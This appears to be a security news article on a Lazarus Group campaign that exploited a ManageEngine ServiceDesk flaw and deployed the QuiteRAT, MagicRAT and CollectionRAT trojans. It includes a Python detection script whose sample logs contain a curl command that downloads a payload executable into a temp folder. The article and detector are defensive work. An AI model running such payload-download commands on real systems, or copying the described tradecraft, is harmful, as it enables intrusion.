After uncovering a campaign by the North Korean state-sponsored Lazarus Group that targeted internet infrastructure and healthcare organizations in the U.S. and UK, researchers discovered new details about two different malware families in use by the prominent threat group.
The campaign by Lazarus Group in early 2023 exploited a ManageEngine ServiceDesk flaw (CVE-2022-47966) just four days after related PoCs were publicly disclosed. After gaining initial access, researchers observed the threat group execute a malicious binary and use the curl command to deploy QuiteRAT. This remote access trojan was previously discovered in February, but further details about this malware have not been divulged before this campaign.
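As an added illustration, not code from the Talos report or this article, the Python below checks process-creation events for the delivery chain described above: a ManageEngine ServiceDesk process spawning curl to fetch a payload. The Sysmon-style log lines, the assumption that ServiceDesk runs as java.exe under its install directory, and the payload URL are all constructed for the example.

```python
"""Detect the QuiteRAT delivery chain: ServiceDesk process -> curl.exe.

Log lines are constructed for this example (Sysmon-style process-creation
events flattened to key="value" pairs); they are not real telemetry.
"""
import re
from dataclasses import dataclass

# Assumption: ServiceDesk Plus runs as a Java process under its install path.
SERVICEDESK_PARENT = re.compile(r"\\ManageEngine\\ServiceDesk\\.*java\.exe$", re.IGNORECASE)


@dataclass
class Alert:
    ts: str
    parent: str
    cmdline: str
    reason: str


def parse(line: str) -> dict:
    """Turn key="value" pairs into a dict; values may contain backslashes."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def detect(lines):
    """Return an Alert for every curl.exe launched by a ServiceDesk process."""
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev.get("EventID") != "1":          # only process-creation events
            continue
        parent, image = ev.get("ParentImage", ""), ev.get("Image", "")
        if not SERVICEDESK_PARENT.search(parent):
            continue                           # parent is not ServiceDesk
        if image.lower().endswith("\\curl.exe"):
            alerts.append(Alert(ev.get("UtcTime", ""), parent, ev.get("CommandLine", ""),
                                "ServiceDesk process spawned curl.exe (QuiteRAT delivery pattern)"))
    return alerts


# Constructed sample: benign child JVM, curl from ServiceDesk (alert), curl run by an admin.
SAMPLE_LOGS = [
    r'EventID="1" UtcTime="2023-02-10 03:12:01" Image="C:\ManageEngine\ServiceDesk\jre\bin\java.exe" '
    r'CommandLine="java -jar postgres-tool.jar" ParentImage="C:\ManageEngine\ServiceDesk\jre\bin\java.exe"',
    r'EventID="1" UtcTime="2023-02-10 03:14:22" Image="C:\Windows\System32\curl.exe" '
    r'CommandLine="curl -o C:\Windows\Temp\svc.exe http://example.invalid/payload" '
    r'ParentImage="C:\ManageEngine\ServiceDesk\jre\bin\java.exe"',
    r'EventID="1" UtcTime="2023-02-10 09:00:05" Image="C:\Windows\System32\curl.exe" '
    r'CommandLine="curl https://example.invalid/status" ParentImage="C:\Windows\explorer.exe"',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOGS):
        print(a)
```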
Researchers said that QuiteRAT shares many capabilities with MagicRAT, another malware family used by the group (such as arbitrary command execution), though it is smaller and lacks the built-in persistence capabilities that MagicRAT has. Both RATs were also built on the Qt framework, a programming library for developing graphical user interfaces. Because neither QuiteRAT nor MagicRAT has a graphical user interface, researchers believe the developers chose Qt to increase the complexity of the malware code rather than for its UI features.
“Lazarus Group’s increasing use of the Qt framework creates challenges for defenders,” said Jung soo An, Asheer Malhotra and Vitor Ventura, researchers with Cisco Talos in a Thursday analysis. “It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, DOT NET etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.”
QuiteRAT is quite simple and has many standard RAT capabilities. In an attack against an internet backend infrastructure provider in the UK, for instance, researchers observed that post-execution, QuiteRAT was used to perform reconnaissance and send preliminary system data to the C2 servers, run arbitrary commands and deploy additional malware.
Due to their similarities, researchers believe that QuiteRAT is an evolution of MagicRAT. For example, both implants use base64 encoding for obfuscation in addition to an extra measure (like XOR) that makes it hard to decode their strings; and they both have a feature that allows them to sleep for a specific period of time, likely used by attackers to keep the implant dormant while ensuring continued access to the compromised network.
In its campaign, the threat actors reused infrastructure that has been documented by the security community over the years, allowing researchers to track these recycled components and identify the newest malware in Lazarus Group’s arsenal, called CollectionRAT. This RAT also has several standard capabilities, including the ability to run arbitrary commands on compromised systems, gather system information and download additional payloads.
“The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly,” said researchers. “Although MFC is a complex object-oriented wrapper around the Win32 and COM APIs, used to create a variety of Windows applications that heavily use user interfaces, controls and events, it is quite popular with malware developers.”
Researchers noted that some of the discovered malware samples, dating from 2021, are signed with the same code signing certificate used by EarlyRAT, another malware family that has been attributed to the Lazarus subgroup Andariel.
On this same infrastructure being reused by Lazarus Group, researchers found several components giving an inside look at what other tools the threat actors are relying on. For instance, they found a malicious copy of the PuTTY Plink reverse tunneling tool, which was being used to serve CollectionRAT to compromised endpoints.
Researchers also identified a beacon from the open-source DeimosC2 framework, which they believe is being deployed during initial access against compromised Linux endpoints. DeimosC2 is a known framework with implants that have various capabilities, including executing commands, stealing credentials and dumping registries, downloading files and executing shellcode.
Overall, the use of CollectionRAT and DeimosC2 highlights how the threat group continues to evolve its techniques while consistently launching attacks over the past year, such as its targeting of out-of-date Microsoft IIS servers in June.
“Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase,” said researchers.